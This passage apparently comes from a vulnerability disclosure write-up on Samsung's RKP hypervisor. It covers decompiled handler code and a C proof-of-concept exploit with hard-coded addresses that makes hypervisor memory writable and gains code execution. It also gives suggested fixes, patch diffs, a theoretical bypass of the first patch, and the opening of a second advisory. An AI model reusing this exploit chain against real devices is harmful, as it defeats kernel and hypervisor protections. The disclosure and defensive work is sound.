res = rkp_s2_page_change_permission(pgd, 0x80 /* read-only */, 0 /* non-executable */, 0);
// ...
}
// ...
// Now iterate over each descriptor of the PGD.
do {
// ...
// Block descriptor (not a table, not invalid).
if ((desc & 0b11) != 0b11) {
if (desc) {
// Make the memory non executable at EL1.
set_pxn_bit_of_desc(desc_p, 1);
}
}
// Table descriptor.
else {
addr = start_addr & 0xffffff803fffffff | offset;
// Call rkp_l2pgt_process_table to process the PMD.
res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
// ...
// Make the memory non executable at EL1 for user PGDs.
set_pxn_bit_of_desc(desc_p, 1);
}
// ...
} while (entry != 0x1000);
rkp_phys_map_unlock(pgd);
return res;
}
rkp_l2pgt_process_table
process our "fake PGD", it marks it as L2
in the PHYSMAP
, sets it as read-only in the stage 2 page tables, then calls check_single_l2e
on each of its entries (that we don't have control over).
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
// ...
rkp_phys_map_lock(pmd);
// // If we are introducing this PMD.
if (is_alloc) {
// If it is not marked as a PMD in the physmap, return without processing it.
if (is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pmd);
return 0;
}
// ...
// And mark the PMD as such in the physmap.
res = rkp_phys_map_set(pmd, type /* L2 */);
// ...
// Make the PMD read-only in the second stage.
res = rkp_s2_page_change_permission(pmd, 0x80 /* read-only */, 0 /* non-executable */, 0);
// ...
}
// ...
// Now iterate over each descriptor of the PMD.
offset = 0;
for (i = 0; i != 0x1000; i += 8) {
addr = offset | start_addr & 0xffffffffc01fffff;
// Call `check_single_l2e` on each descriptor.
res += check_single_l2e(pmd + i, addr, is_alloc);
offset += 0x200000;
}
rkp_phys_map_unlock(pgd);
return res;
}
check_single_l2e
will set the PXN bit of the descriptor (which in our case is each 8-byte value in our target page) and will also process values that look like table descriptors. That's something we will need to keep in mind when choosing our target page in hypervisor memory.
int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
// ...
// The virtual address is not executable, set the PXN bit of the descriptor.
set_pxn_bit_of_desc(desc_p, 2);
// ...
// Get the descriptor type.
desc = *desc_p;
type = *desc & 0b11;
// Block descriptor, return without processing it.
if (type == 0b01) {
return 0;
}
// Invalid descriptor, return without processing it.
if (type != 0b11) {
if (desc) {
uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
}
return 0;
}
// ...
// Call rkp_l3pgt_process_table to process the PT.
return rkp_l3pgt_process_table(*desc_p & 0xfffffffff000, start_addr, is_alloc, protect);
}
Up to this point, we have gotten our target page marked as L2
in the physmap
, and remapped as read-only in the stage 2 page tables. That's great, but to be able to modify it from the kernel, we need to have it mapped as writable in the second stage.
The second step of the exploit is to call the rkp_cmd_free_pgd
command handler, which simply calls rkp_l1pgt_free_pgd
. It itself calls rkp_l1pgt_process_table
, which once again will process our "fake PGD" (in the code below, high_bits
will be 0 and is_alloc
will this time be 0). More specifically, it will set our "fake PGD" as FREE
in the physmap
, set it as read-write in the stage 2, then call rkp_l2pgt_process_table
to process our "fake PMD".
int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
// ...
rkp_phys_map_lock(pgd);
// ...
// If we are retiring this PGD.
if (!is_alloc) {
// If it is not marked as a PGD in the physmap, return without processing it.
if (!is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
// Mark the PGD as `FREE` in the physmap.
res = rkp_phys_map_set(pgd, FREE);
// ...
// // Make the PGD writable in the second stage.
res = rkp_s2_page_change_permission(pgd, 0 /* writable */, 1 /* executable */, 0);
// ...
}
// Now iterate over each descriptor of the PGD.
offset = 0;
entry = 0;
start_addr = high_bits << 39;
do {
// Block descriptor (not a table, not invalid).
if ((desc & 0b11) != 0b11) {
if (desc) {
// Make the memory non executable at EL1.
set_pxn_bit_of_desc(desc_p, 1);
}
} else {
addr = start_addr & 0xffffff803fffffff | offset;
// Call rkp_l2pgt_process_table to process the PMD.
res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
// ...
// Make the memory non executable at EL1 for user PGDs.
set_pxn_bit_of_desc(desc_p, 1);
}
// ...
} while (entry != 0x1000);
rkp_phys_map_unlock(pgd);
return res;
}
rkp_l2pgt_process_table
process our "fake PGD", it marks it as FREE
in the physmap
, sets it as read-write in the stage 2 page tables, then calls check_single_l2e
again on each of its entries (that will do the same as before).
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
// ...
rkp_phys_map_lock(pmd);
// ...
// If we are retiring this PMD.
if (!is_alloc) {
// If it is not marked as a PMD in the physmap, return without processing it.
if (!is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
// ...
// Mark the PMD as `FREE` in the physmap.
res = rkp_phys_map_set(pmd, FREE);
// ...
// Make the PMD writable in the second stage.
res = rkp_s2_page_change_permission(pmd, 0 /* writable */, 1 /* executable */, 0);
// ...
}
// Now iterate over each descriptor of the PMD.
offset = 0;
for (i = 0; i != 0x1000; i += 8) {
addr = offset | start_addr & 0xffffffffc01fffff;
// Call `check_single_l2e` on each descriptor.
res += check_single_l2e(pmd + i, addr, is_alloc);
offset += 0x200000;
}
rkp_phys_map_unlock(pgd);
return res;
}
We have finally gotten our target page remapped as writable in the stage 2 page tables. Perfect, now we need to find a target page that will not make the hypervisor crash when its contents are processed by the check_single_l2e
function.
Because check_single_l2e
sets the PXN bit of the "fake PUD" descriptors (i.e. the content of our target page) and further processes values that look like table descriptors, we cannot directly target pages located in RKP's code segment. Our target must be writable from EL2, which is the case for RKP's page tables (either the stage 2 page tables for EL1 or the page tables for EL2). But by virtue of being page tables, they contain valid descriptors, so they are very likely to make RKP or the kernel crash at some point as the result of this processing. That is why we didn't target them.
Instead, we chose to target the memory page backing the protected_ranges
memlist, which is the page that contains all its memlist_entry_t
instances. It contains values that are always aligned on 8 bytes, so they look like invalid descriptors to the check_single_l2e
function. And by nullifying this list from the kernel, we would then be able to provide addresses inside hypervisor memory to all the command handlers.
This protected_ranges
memlist is allocated in the pa_restrict_init
function:
int64_t pa_restrict_init() {
// Initialize the memlist of protected ranges.
memlist_init(&protected_ranges);
// Add the uH memory region to it (containing the hypervisor code and data).
memlist_add(&protected_ranges, 0x87000000, 0x200000);
// ...
}
To know precisely where the memory backing this memlist will be allocated, we need to dig into the memlist_init
function. It preallocates enough space for 5 entries (the default capacity) by calling the memlist_reserve
function before initializing the structure's fields.
int64_t memlist_init(memlist_t* list) {
// ...
// Reset the structure fields.
memset(list, 0, sizeof(memlist_t));
// By default, preallocate space for 5 entries.
res = memlist_reserve(list, 5);
// Fill the structure fields accordingly.
list->capacity = 5;
list->merged = 0;
list->unkn_14 = 0;
cs_init(&list->cs);
return res;
}
It turns out the protected_ranges
memlist never stores more than 5 memory regions, even with the memory backing the physmap
being added to it. Thus, it never gets reallocated, and there's only ever one allocation made. Now let's see what the memlist_reserve
function does. It allocates space for the specified number of memlist_entry
entries and copies the old entries to the newly allocated memory, if there were any.
int64_t memlist_reserve(memlist_t* list, uint64_t size) {
// ...
// Sanity-check the arguments.
if (!list || !size) {
return -1;
}
// Allocate memory for `size` entries of type `memlist_entry`.
base = heap_alloc(0x20 * size, 0);
if (!base) {
return -1;
}
// Reset the memory that was just allocated.
memset(base, 0, 0x20 * size);
// If the list already contains some entries.
if (list->base) {
// Copy these entries from the old array to the new one.
for (index = 0; index < list->count; ++index) {
new_entry = &base[index];
old_entry = &list->base[index];
new_entry->addr = old_entry->addr;
new_entry->size = old_entry->size;
new_entry->unkn_10 = old_entry->unkn_10;
new_entry->extra = old_entry->extra;
}
// And free the old memory.
heap_free(list->base);
}
list->base = base;
return 0;
}
The memory is allocated by memlist_reserve
by calling heap_alloc
, so it comes from the "static heap" allocator. In pa_restrict_init
, when the allocation for protected_ranges
memlist is made, the "static region" contains:
So we know the address returned by the allocator should be somewhere after 0x87046000
(i.e. between the uH/RKP and "bigdata" regions). To know at which address exactly it will be, we need to find all the allocations that are performed before pa_restrict_init
is called.
By carefully tracing the execution statically, we find 4 "static heap" allocations:
rkp_init_cmd_counts
;uh_init_bigdata
;uh_init_context
;memlist_init(&dynamic_regions)
call in uh_init
.int64_t uh_init(int64_t uh_base, int64_t uh_size) {
// ...
apps_init();
uh_init_bigdata();
uh_init_context();
memlist_init(&uh_state.dynamic_regions);
pa_restrict_init();
// ...
}
uint64_t apps_init() {
// ...
res = uh_handle_command(i, 0, &saved_regs);
// ...
}
int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
// ...
return cmd_handler(regs);
}
int64_t rkp_cmd_init() {
// ...
rkp_init_cmd_counts();
// ...
}
uint8_t* rkp_init_cmd_counts() {
// ...
malloc(0x8a, 0);
// ...
}
int64_t uh_init_bigdata() {
if (!bigdata_state) {
bigdata_state = malloc(0x230, 0);
}
memset(0x870ffc40, 0, 0x3c0);
memset(bigdata_state, 0, 0x230);
return s1_map(0x870ff000, 0x1000, UNKN3 | WRITE | READ);
}
int64_t* uh_init_context() {
// ...
uh_context = malloc(0x1000, 0);
if (!uh_context) {
uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
}
return memset(uh_context, 0, 0x1000);
}
Now we are ready to calculate the address. Each allocation has a header of 0x18 bytes, and the allocator rounds up the total size to the next 8-byte boundary. By doing our math properly, we find that the physical address of the protected_ranges
allocation is 0x870473D8:
>>> f = lambda x: (x + 0x18 + 7) & 0xFFFFFFF8
>>> 0x87046000 + f(0x8A) + f(0x230) + f(0x1000) + f(0xA0) + 0x18
0x870473D8
We also need to know what's in the same page (0x87047000) as the protected_ranges
memlist. Thanks to our tracing of the prior allocations, we know that it is preceded by the uh_context
, which is memset
and only used on panics. Similarly, we can determine that it is followed by a memlist reallocation in init_cmd_add_dynamic_region
and a stage 2 page table allocation in init_cmd_initialize_dynamic_heap
with a page-sized padding. This means that there should be no value looking like a page table descriptor in this page (on our test device).
After making the page containing the protected_ranges
memlist writable in the stage 2 using the rkp_cmd_new_pgd
and rkp_cmd_free_pgd
commands, we directly modify it from the kernel. Our goal is to make check_kernel_input
always return 0 so that we can give arbitrary addresses (including addresses in hypervisor memory) to all command handlers. check_kernel_input
calls protected_ranges_contains
, which itself calls memlist_contains_addr
. This function simply checks if the address is within any of the regions of the memlist.
int64_t memlist_contains_addr(memlist_t* list, uint64_t addr) {
// ...
cs_enter(&list->cs);
// Iterate over each of the entries of the memlist.
for (index = 0; index < list->count; ++index) {
entry = &list->base[index];
// If the address is within the start address and end address of the region.
if (addr >= entry->addr && addr < entry->addr + entry->size) {
cs_exit(&list->cs);
return 1;
}
}
cs_exit(&list->cs);
return 0;
}
The first entry in protected_ranges
is the hypervisor memory region. Zeroing its size
field (at offset 8) should be enough to disable the blacklist.
The final step to fully compromise the hypervisor is to get arbitrary code execution, which is fairly easy now that we can give any address to all command handlers. This can be achieved in multiple ways, but the simplest way is likely to modify the page tables of the stage 2 at EL1.
For example, we can target the level 2 descriptor that covers the memory range of the hypervisor and turn it into a writable block descriptor. The write itself can be performed by calling rkp_cmd_write_pgt3
(that calls rkp_l3pgt_write
) since we have disabled the protected_ranges
memlist.
To find the physical address of the target descriptor, we can dump the initial stage 2 page tables at EL1 using an IDAPython script:
import ida_bytes
def parse_static_s2_page_tables(table, level=1, start_vaddr=0):
size = [0x8000000000, 0x40000000, 0x200000, 0x1000][level]
for i in range(512):
desc_addr = table + i * 8
desc = ida_bytes.get_qword(desc_addr)
if (desc & 0b11) == 0b00 or (desc & 0b11) == 0b01:
continue
paddr = desc & 0xFFFFFFFFF000
vaddr = start_vaddr + i * size
if level < 3 and (desc & 0b11) == 0b11:
print("L%d Table for %016x-%016x is at %08x" \
% (level + 1, vaddr, vaddr + size, paddr))
parse_static_s2_page_tables(paddr, level + 1, vaddr)
parse_static_s2_page_tables(0x87028000)
Below is the result of running this script on the binary running on our target device.
L2 Table for 0000000000000000-0000000040000000 is at 87032000
L3 Table for 0000000002000000-0000000002200000 is at 87033000
L2 Table for 0000000080000000-00000000c0000000 is at 8702a000
L2 Table for 00000000c0000000-0000000100000000 is at 8702b000
L2 Table for 0000000880000000-00000008c0000000 is at 8702c000
L2 Table for 00000008c0000000-0000000900000000 is at 8702d000
L2 Table for 0000000900000000-0000000940000000 is at 8702e000
L2 Table for 0000000940000000-0000000980000000 is at 8702f000
L2 Table for 0000000980000000-00000009c0000000 is at 87030000
L2 Table for 00000009c0000000-0000000a00000000 is at 87031000
We know that the L2 table that maps 0x80000000-0xc0000000 is located at 0x8702A000. To obtain the descriptor's address, which depends on the target address (0x87000000) and the size of a L2 block (0x200000), we simply need to add an offset to the address of the L2 table:
>>> 0x8702A000 + ((0x87000000 - 0x80000000) // 0x200000) * 8
0x8702A1C0
The descriptor's value is composed of the target address and the wanted attributes: 0x87000000 | 0x4FD = 0x870004FD
.
0 1 00 11 1111 01 = 0x4FD
^ ^ ^ ^ ^ ^
| | | | | `-- Type: block descriptor
| | | | `------- MemAttr[3:0]: NM, OWBC, IWBC
| | | `---------- S2AP[1:0]: read/write
| | `------------- SH[1:0]: NS
| `--------------- AF: 1
`----------------- FnXS: 0
The descriptor is changed by calling rkp_cmd_write_pgt3
, which calls rkp_l3pgt_write
. Since we are writing to an existing page table that is marked as L3
in the physmap
and the new value is a block descriptor, the check passes, and the write is performed in set_entry_of_pgt
.
int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
// ...
// Convert the PT descriptor PA into a VA.
ptep_pa = rkp_get_pa(ptep);
rkp_phys_map_lock(ptep_pa);
// If the PT is marked as such in the physmap, or as `FREE`.
if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
// If the new descriptor is not a page descriptor, or its PXN bit is set, the check passes.
if ((pte_val & 0b11) != 0b11 || get_pxn_bit_of_desc(pte_val, 3)) {
allowed = 1;
}
// Otherwise, the check fails if RKP is deferred initialized.
else {
allowed = rkp_deferred_inited == 0;
}
}
// If the PT is marked as something else, the check also fails.
else {
allowed = 0;
}
rkp_phys_map_unlock(ptep_pa);
// If the check failed, trigger a policy violation.
if (!allowed) {
pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
}
// Otherwise, perform the write of the PT descriptor on behalf of the kernel.
return set_entry_of_pgt(ptep_pa, pte_val);
}
uint64_t* set_entry_of_pgt(uint64_t* ptr, uint64_t val) {
*ptr = val;
return ptr;
}
This simple proof of concept assumes that we have obtained kernel memory read/write primitives and can make hypervisor calls.
#define UH_APP_RKP 0xC300C002
#define RKP_CMD_NEW_PGD 0x0A
#define RKP_CMD_FREE_PGD 0x09
#define RKP_CMD_WRITE_PGT3 0x05
#define PROTECTED_RANGES_BITMAP 0x870473D8
#define BLOCK_DESC_ADDR 0x8702A1C0
#define BLOCK_DESC_DATA 0x870004FD
uint64_t pa_to_va(uint64_t va) {
return pa - 0x80000000UL + 0xFFFFFFC000000000UL;
}
void exploit() {
/* allocate and clear our "fake PGD" */
uint64_t pgd = kernel_alloc(0x1000);
for (uint64_t i = 0; i < 0x1000; i += 8)
kernel_write(pgd + i, 0UL);
/* write our "fake PMD" descriptor */
kernel_write(pgd, (PROTECTED_RANGES_BITMAP & 0xFFFFFFFFF000UL) | 3UL);
/* make the hyp call that will set the page RO */
kernel_hyp_call(UH_APP_RKP, RKP_CMD_NEW_PGD, pgd);
/* make the hyp call that will set the page RW */
kernel_hyp_call(UH_APP_RKP, RKP_CMD_FREE_PGD, pgd);
/* zero out the "protected ranges" first entry */
kernel_write(pa_to_va(PROTECTED_RANGES_BITMAP + 8), 0UL);
/* write the descriptor to make hyp memory writable */
kernel_hyp_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3,
pa_to_va(BLOCK_DESC_ADDR), BLOCK_DESC_DATA);
}
The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1
. The two-fold bug appeared to be present in the binaries of both Exynos and Snapdragon devices, including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.
The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled. In particular, on Snapdragon devices, the s2_map
function (called from rkp_s2_page_change_permission
and rkp_s2_range_change_permission
) makes an indirect call to a QHEE function (since it is QHEE that is in charge of the stage 2 page tables). We did not follow this call to see if it made any additional checks that could prevent the exploitation of this vulnerability. On the Galaxy S20, there is also an indirect call to the new hypervisor framework (called H-Arx), which we did not follow either.
The memory layout will also be different on other devices than the one we have targeted in the exploit, so the hard-coded addresses won't work. But we believe that they can be adapted or that an alternative exploitation strategy can be found for these devices.
Here are the immediate remediation steps we suggested to Samsung:
- Mark the pages unmapped by s2_unmap as S2UNMAP in the physmap
- Perform the additional checks of rkp_s2_page_change_permission in
rkp_s2_range_change_permission as well
- Add calls to check_kernel_input in the rkp_lxpgt_process_table functions
After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3
.
The first changes were made to the rkp_s2_page_change_permission
function. It now takes a type
argument that it will use to mark the page in the physmap
, regardless of whether the checks pass or fail. In addition, for read-only permissions, the changes to the physmap
and ro_bitmap
are made prior to changing the stage 2 page tables, and after for read-write permissions.
int64_t rkp_s2_page_change_permission(void* p_addr,
uint64_t access,
+ uint32_t type,
uint32_t exec,
uint32_t allow) {
// ...
if (!allow && !rkp_inited) {
// ...
- return -1;
+ return rkp_phys_map_set(p_addr, type) ? -1 : 0;
}
if (is_phys_map_s2unmap(p_addr)) {
// ...
- return -1;
+ return rkp_phys_map_set(p_addr, type) ? -1 : 0;
}
if (page_allocator_is_allocated(p_addr) == 1
|| (p_addr >= TEXT_PA && p_addr < ETEXT_PA)
|| (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA))
- return 0;
+ return rkp_phys_map_set(p_addr, type) ? -1 : 0;
// ...
+ if (access == 0x80) {
+ if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+ return -1;
+ }
if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
return -1;
}
tlbivaae1is(((p_addr + 0x80000000) | 0xFFFFFFC000000000) >> 12);
- return rkp_set_pgt_bitmap(p_addr, access);
+ if (access != 0x80)
+ if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+ return -1;
+ return 0;
Surprisingly, no changes were made to the rkp_s2_range_change_permission
function. So far, none of the changes prevent using these two functions to remap previously unmapped memory.
The second set of changes were to the rkp_l1pgt_process_table
, rkp_l2pgt_process_table
, and rkp_l3pgt_process_table
functions. In each of these functions, a call to check_kernel_input
has been added in the allocation path before changing the stage 2 permissions of the page.
int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
// ...
if (is_alloc) {
+ check_kernel_input(pgd);
// ...
} else {
// ...
}
// ...
}
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
// ...
if (is_alloc) {
+ check_kernel_input(pmd);
// ...
} else {
// ...
}
}
int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
// ...
if (is_alloc) {
+ check_kernel_input(pte);
// ...
} else {
// ...
}
// ...
}
These changes make it so that we can no longer use the specific code path implemented in our exploit to call rkp_s2_page_change_permission
. However, it doesn't prevent any of the other ways to call this function that we presented earlier.
We were unable to find a change that fixes the actual issue, which is that pages unmapped in the stage 2 are not marked as S2UNMAP
in the physmap
. To demonstrate to Samsung that their fix was not sufficient, we started looking for a new exploitation strategy. While we were, unfortunately, unable to test it on a real device due to a lack of time, we devised the theoretical approach explained below.
In the Exploring Our Options section, we mentioned that the set_range_to_rox_l3
and set_range_to_pxn_l3
functions can be used to reach a call to rkp_s2_page_change_permission
, but with two major caveats. First, to call them with our target page, we need a table descriptor in a kernel PMD to point to our target page. Furthermore, they are part of the "dynamic load" feature that is only available on Exynos devices.
However, if we are able to call these functions, we can easily make our target page writable in the second stage. We can first call set_range_to_rox_l3
to mark our target page KERNEL|L3
in the physmap
but also make it read-only in the second stage. We can then call set_range_to_pxn_l3
, which requires it to be marked KERNEL|L3
in physmap
but also makes it writable in the second stage.
Our new strategy requires our target page to be pointed to by a table descriptor of a kernel PMD. This can be accomplished by changing an invalid descriptor into a table descriptor pointing to a "fake PT" that is actually our target page of hypervisor memory, as illustrated below.
|
+--------------------+ | +--------------------+ .-> +--------------------+
| | | | | | | |
+--------------------+ | +--------------------+ | +--------------------+
| invalid descriptor | | | table descriptor ---' | |
+--------------------+ | +--------------------+ +--------------------+
| | | | | | |
+--------------------+ | +--------------------+ +--------------------+
| | | | | | |
+--------------------+ | +--------------------+ +--------------------+
|
read PMD | read PMD "fake PT"
in kernel memory | in kernel memory in hypervisor memory
Let's call the PA of the PMD descriptor pmd_desc_pa
, the start VA of the region that it maps start_va
, and the PA of our target page target_pa
. To change the descriptor's value (from 0 to target_pa | 3
), we can invoke the rkp_cmd_write_pgt2
command that calls rkp_l2pgt_write
.
In rkp_l2pgt_write
, since we are writing to an existing kernel PMD that is already marked as KERNEL|L2
in the physmap
, the first check passes. And because the descriptor value changes from a zero to a non-zero value, it only calls check_single_l2e
once, with the new descriptor value.
In check_single_l2e
, by choosing a start_va
not contained in the executable_regions
, the PXN bit of the new descriptor value is set and protect
is set to false. Then, because the new descriptor is a table, rkp_l3pgt_process_table
is called.
In rkp_l3pgt_process_table
, because protect
is false, the function returns early.
Finally, back in rkp_l2pgt_write
, the new value of the descriptor is written.
We are now ready to call the set_range_to_rox_l3
and set_range_to_pxn_l3
functions using the "dynamic load" commands that we will explain in the section about the next vulnerability. In particular, we use the subcommands dynamic_load_ins
and dynamic_load_rm
.
For reference, the code path that needs to be taken is as follows:
rkp_cmd_dynamic_load
`-- dynamic_load_ins
|-- dynamic_load_check
| code range must be in the binary range
| must not overlap another "dynamic executable"
| must not be in the ro_bitmap
|-- dynamic_load_protection
| will make the code range as RO (and add it to ro_bitmap)
|-- dynamic_load_verify_signing
| if type != 3, no signature checking
|-- dynamic_load_make_rox
| calls rkp_set_range_to_rox!
|-- dynamic_load_add_executable
| code range added to the executable_regions
`-- dynamic_load_add_dynlist
code range added to the dynamic_load_regions
rkp_cmd_dynamic_load
`-- dynamic_load_rm
|-- dynamic_load_rm_dynlist
| code range is removed from dynamic_load_regions
|-- dynamic_load_rm_executable
| code range is removed from executable_regions
|-- dynamic_load_set_pxn
| calls rkp_set_range_to_pxn!
`-- dynamic_load_rw
will make the code range as RW (and remove it from ro_bitmap)
It should be noted that, similarly to the original exploitation path, values in the target page that look like valid PT descriptors will have their PXN bit set. Thus, the target page needs to be writable. Nevertheless, we can continue to target the memory backing the protected_ranges
bitmap.
After being notified a second time by Samsung that the vulnerability was patched, we downloaded and binary diffed the most recent firmware update available for the Samsung Galaxy S10. The exact version used was G973FXXSEFUJ2
.
Changes were made to the rkp_s2_page_change_permission
function. It now calls check_kernel_input
to ensure the physical address of the page is not in the protected_ranges
memlist. This prevents targeting hypervisor memory with this function.
int64_t rkp_s2_page_change_permission(void* p_addr,
uint64_t access,
- uint32_t exec,
- uint32_t allow) {
+ uint32_t exec) {
// ...
- if (!allow && !rkp_inited) {
+ if (!rkp_deferred_inited) {
// ...
}
+ check_kernel_input(p_addr);
// ...
}
This time, changes were also made to rkp_s2_range_change_permission
. First, it calls protected_ranges_overlaps
to ensure that the range does not overlap with the protected_ranges
memlist. It then also ensures that none of the target pages are marked as S2UNMAP
in the physmap
.
int64_t rkp_s2_range_change_permission(uint64_t start_addr,
uint64_t end_addr,
uint64_t access,
uint32_t exec,
uint32_t allow) {
// ...
- if (!allow && !rkp_inited) {
- uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
- rkp_policy_violation("Range change permission prohibited");
- } else if (allow != 2 && rkp_deferred_inited) {
- uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
- rkp_policy_violation("Range change permission prohibited");
- }
+ if (rkp_deferred_inited) {
+ if (allow != 2) {
+ uh_log('L', "rkp_paging.c", 643, "RKP_33605b63");
+ rkp_policy_violation("Range change permission prohibited");
+ }
+ if (start_addr > end_addr) {
+ uh_log('L', "rkp_paging.c", 650, "RKP_b3952d08%llxRKP_dd15365a%llx",
+ start_addr, end_addr - start_addr);
+ rkp_policy_violation("Range change permission prohibited");
+ }
+ protected_ranges_overlaps(start_addr, end_addr - start_addr);
+ addr = start_addr;
+ do {
+ rkp_phys_map_lock(addr);
+ if (is_phys_map_s2unmap(addr))
+ rkp_policy_violation("RKP_1b62896c %p", addr);
+ rkp_phys_map_unlock(addr);
+ addr += 0x1000;
+ } while (addr < end_addr);
+ }
// ...
}
+int64_t protected_ranges_overlaps(uint64_t addr, uint64_t size) {
+ if (memlist_overlaps_range(&protected_ranges, addr, size)) {
+ uh_log('L', "pa_restrict.c", 122, "RKP_03f2763e%lx RKP_a54942c8%lx", addr, size);
+ return uh_log('D', "pa_restrict.c", 124, "RKP_03f2763e%lxRKP_c5d4b9a4%lx", addr, size);
+ }
+ return 0;
+}
SVE-2021-20179 (CVE-2021-25416): Possible creating executable kernel page via abusing dynamic load functions
Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 5, 2021
Disclosure status: Privately disclosed.
Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to create executable kernel page outside code area.
The patch adds the proper address validation in RKP to prevent creating executable kernel page.
We found this vulnerability while investigating the "dynamic load" feature of RKP. It allows the kernel to load into memory executable binaries that must be signed by Samsung. It is currently only used for the Fully Interactive Mobile Camera (FIMC) subsystem, and since this subsystem is only available on Exynos devices, this feature is not implemented for Snapdragon devices.
To understand how this feature works, we can start by looking at the kernel sources to find where it is used. By searching for the RKP_DYNAMIC_LOAD
command, we can find two functions that load and unload "dynamic executables": fimc_is_load_ddk_bin
and fimc_is_load_rta_bin
.
In fimc_is_load_ddk_bin
, the kernel starts by filling the rkp_dynamic_load_t
structure with information about the binary. If the binary is already loaded, it invokes the RKP_DYN_COMMAND_RM
subcommand to unload it. It then makes the whole binary memory writable and copies its code and data into it. Finally, it makes the binary code executable by invoking the RKP_DYN_COMMAND_INS
subcommand.
int fimc_is_load_ddk_bin(int loadType)
{
// ...
rkp_dynamic_load_t rkp_dyn;
static rkp_dynamic_load_t rkp_dyn_before = {0};
#endif
// ...
if (loadType == BINARY_LOAD_ALL) {
memset(&rkp_dyn, 0, sizeof(rkp_dyn));
rkp_dyn.binary_base = lib_addr;
rkp_dyn.binary_size = bin.size;
rkp_dyn.code_base1 = memory_attribute[INDEX_ISP_BIN].vaddr;
rkp_dyn.code_size1 = memory_attribute[INDEX_ISP_BIN].numpages * PAGE_SIZE;
#ifdef USE_ONE_BINARY
rkp_dyn.type = RKP_DYN_FIMC_COMBINED;
rkp_dyn.code_base2 = memory_attribute[INDEX_VRA_BIN].vaddr;
rkp_dyn.code_size2 = memory_attribute[INDEX_VRA_BIN].numpages * PAGE_SIZE;
#else
rkp_dyn.type = RKP_DYN_FIMC;
#endif
if (rkp_dyn_before.type)
uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_RM,(u64)&rkp_dyn_before, 0, 0);
memcpy(&rkp_dyn_before, &rkp_dyn, sizeof(rkp_dynamic_load_t));
// ...
ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_ISP_BIN]);
// ...
#ifdef USE_ONE_BINARY
ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_VRA_BIN]);
// ...
#endif
// ...
memcpy((void *)lib_addr, bin.data, bin.size);
// ...
ret = uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, (u64)&rkp_dyn, 0, 0);
// ...
}
The rkp_dynamic_load_t
structure is filled with the type of the executable (RKP_DYN_FIMC
if it has one code segment, RKP_DYN_FIMC_COMBINED
if it has two), the base address and size of the whole binary, and the base address and size of its code segment(s).
typedef struct dynamic_load_struct{
u32 type;
u64 binary_base;
u64 binary_size;
u64 code_base1;
u64 code_size1;
u64 code_base2;
u64 code_size2;
} rkp_dynamic_load_t;
In the hypervisor, the handler of the RKP_DYNAMIC_LOAD
command and its subcommands is the rkp_cmd_dynamic_load
function. It dispatches the subcommand (RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT
, RKP_DYN_COMMAND_INS
, or RKP_DYN_COMMAND_RM
) to the appropriate function.
int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
// ...
// Get the subcommand and convert the argument structure address.
type = regs->x2;
rkp_dyn = (rkp_dynamic_load_t*)rkp_get_pa(regs->x3);
// Call the handler specific to the subcommand type.
if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
res = dynamic_breakdown_before_init(rkp_dyn);
if (res) {
uh_log('W', "rkp_dynamic.c", 392, "dynamic_breakdown_before_init failed");
}
} else if (type == RKP_DYN_COMMAND_INS) {
res = dynamic_load_ins(rkp_dyn);
if (!res) {
uh_log('L', "rkp_dynamic.c", 406, "dynamic_load ins type:%d success", rkp_dyn->type);
}
